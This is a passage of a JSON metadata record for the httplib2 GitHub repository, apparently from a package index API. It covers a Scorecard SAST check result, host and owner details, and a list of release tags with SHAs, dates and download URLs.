0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36646944,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-14T02:00:06.934Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-21T12:45:06.764Z","dependent_packages_count":8,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"